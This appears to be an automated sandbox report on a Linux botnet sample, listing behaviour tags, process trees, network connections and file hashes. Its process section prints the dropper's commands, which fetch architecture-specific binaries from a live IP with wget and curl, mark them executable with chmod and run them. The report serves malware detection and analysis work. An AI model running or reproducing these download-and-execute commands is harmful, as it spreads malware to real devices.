Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/85/status /tmp/Chaotic N/A
File opened for reading /proc/11/status /tmp/Chaotic N/A
File opened for reading /proc/902/status /tmp/Chaotic N/A
File opened for reading /proc/1532/status /tmp/Chaotic N/A
File opened for reading /proc/1484/status /tmp/Chaotic N/A
File opened for reading /proc/1564/status /tmp/Chaotic N/A
File opened for reading /proc/1145/status /tmp/Chaotic N/A
File opened for reading /proc/5/status /tmp/Chaotic N/A
File opened for reading /proc/1169/status /tmp/Chaotic N/A
File opened for reading /proc/22/status /tmp/Chaotic N/A
File opened for reading /proc/1479/status /tmp/Chaotic N/A
File opened for reading /proc/27/status /tmp/Chaotic N/A
File opened for reading /proc/28/status /tmp/Chaotic N/A
File opened for reading /proc/1234/status /tmp/Chaotic N/A
File opened for reading /proc/1126/status /tmp/Chaotic N/A
File opened for reading /proc/79/status /tmp/Chaotic N/A
File opened for reading /proc/451/status /tmp/Chaotic N/A
File opened for reading /proc/1480/status /tmp/Chaotic N/A
File opened for reading /proc/270/status /tmp/Chaotic N/A
File opened for reading /proc/433/status /tmp/Chaotic N/A
File opened for reading /proc/17/status /tmp/Chaotic N/A
File opened for reading /proc/1145/status /tmp/Chaotic N/A
File opened for reading /proc/1087/status /tmp/Chaotic N/A
File opened for reading /proc/548/status /tmp/Chaotic N/A
File opened for reading /proc/645/status /tmp/Chaotic N/A
File opened for reading /proc/1017/status /tmp/Chaotic N/A
File opened for reading /proc/1141/status /tmp/Chaotic N/A
File opened for reading /proc/1159/status /tmp/Chaotic N/A
File opened for reading /proc/1158/status /tmp/Chaotic N/A
File opened for reading /proc/1214/status /tmp/Chaotic N/A
File opened for reading /proc/473/status /tmp/Chaotic N/A
File opened for reading /proc/1484/status /tmp/Chaotic N/A
File opened for reading /proc/1163/status /tmp/Chaotic N/A
File opened for reading /proc/1139/status /tmp/Chaotic N/A
File opened for reading /proc/1064/status /tmp/Chaotic N/A
File opened for reading /proc/1530/status /tmp/Chaotic N/A
File opened for reading /proc/31/status /tmp/Chaotic N/A
File opened for reading /proc/1037/status /tmp/Chaotic N/A
File opened for reading /proc/760/status /tmp/Chaotic N/A
File opened for reading /proc/1311/status /tmp/Chaotic N/A
File opened for reading /proc/1017/status /tmp/Chaotic N/A
File opened for reading /proc/980/status /tmp/Chaotic N/A
File opened for reading /proc/35/status /tmp/Chaotic N/A
File opened for reading /proc/160/status /tmp/Chaotic N/A
File opened for reading /proc/78/status /tmp/Chaotic N/A
File opened for reading /proc/437/status /tmp/Chaotic N/A
File opened for reading /proc/1237/status /tmp/Chaotic N/A
File opened for reading /proc/1136/status /tmp/Chaotic N/A
File opened for reading /proc/28/status /tmp/Chaotic N/A
File opened for reading /proc/9/status /tmp/Chaotic N/A
File opened for reading /proc/434/status /tmp/Chaotic N/A
File opened for reading /proc/434/status /tmp/Chaotic N/A
File opened for reading /proc/1479/status /tmp/Chaotic N/A
File opened for reading /proc/1171/status /tmp/Chaotic N/A
File opened for reading /proc/6/status /tmp/Chaotic N/A
File opened for reading /proc/17/status /tmp/Chaotic N/A
File opened for reading /proc/985/status /tmp/Chaotic N/A
File opened for reading /proc/539/status /tmp/Chaotic N/A
File opened for reading /proc/162/status /tmp/Chaotic N/A
File opened for reading /proc/3/status /tmp/Chaotic N/A
File opened for reading /proc/1183/status /tmp/Chaotic N/A
File opened for reading /proc/1050/status /tmp/Chaotic N/A
File opened for reading /proc/1522/status /tmp/Chaotic N/A
File opened for reading /proc/660/status /tmp/Chaotic N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/camp.ppc /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm /usr/bin/wget N/A
File opened for modification /tmp/camp.arm5 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/wget N/A
File opened for modification /tmp/camp.x86 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips /usr/bin/wget N/A
File opened for modification /tmp/camp.mips /usr/bin/curl N/A
File opened for modification /tmp/camp.mips64 /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/curl N/A
File opened for modification /tmp/busybox /bin/cp N/A
File opened for modification /tmp/camp.arc /usr/bin/wget N/A
File opened for modification /tmp/Chaotic /tmp/ohshit.sh N/A
File opened for modification /tmp/camp.mpsl /usr/bin/wget N/A
File opened for modification /tmp/camp.ppc /usr/bin/curl N/A
File opened for modification /tmp/camp.sh4 /usr/bin/wget N/A
File opened for modification /tmp/camp.x86 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm6 /usr/bin/wget N/A
File opened for modification /tmp/camp.sparc /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/curl N/A
File opened for modification /tmp/camp.sh4 /usr/bin/curl N/A
File opened for modification /tmp/camp.arc /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/curl N/A
File opened for modification /tmp/camp.arm6 /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/camp.i686 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm5 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arc]

/bin/cat

[cat camp.arc]

/bin/chmod

[chmod +x busybox camp.arc Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86]

/bin/cat

[cat camp.x86]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86_64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86_64]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.i686]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.i686]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips64]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mpsl]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mpsl]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm5]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm5]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm6]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm6]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm7]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm7]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.ppc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.ppc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sparc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sparc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.m68k]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.m68k]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sh4]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sh4]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

Network

Country Destination Domain Proto
US 198.12.107.126:80 198.12.107.126 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.17:443 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp

Files

/tmp/busybox

MD5 b4dede5fc0b1bad5cb8e901bde126b97
SHA1 10cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256 a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA512 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

/tmp/camp.arc

MD5 36a7a1e959eaf7d6896505777912ecdf
SHA1 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919
SHA256 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca
SHA512 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0

/tmp/Chaotic

MD5 dac9f1dcafdb77db0d0ff1be1e704b1e
SHA1 e83605a050e0aaad3dba360545a00036f083eb91
SHA256 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d
SHA512 e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571

memory/1507-1-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1517-2-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1527-3-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1537-4-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1547-5-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1559-6-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1569-7-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1579-8-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1589-9-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1599-10-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1609-11-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1619-12-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1629-13-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1639-14-0x0000000008048000-0x000000000805bc40-memory.dmp